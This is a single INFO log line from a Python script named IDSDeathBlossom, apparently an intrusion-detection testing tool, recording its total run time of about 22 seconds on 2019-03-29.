2019-03-29 07:44:08,307 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 21.9559938908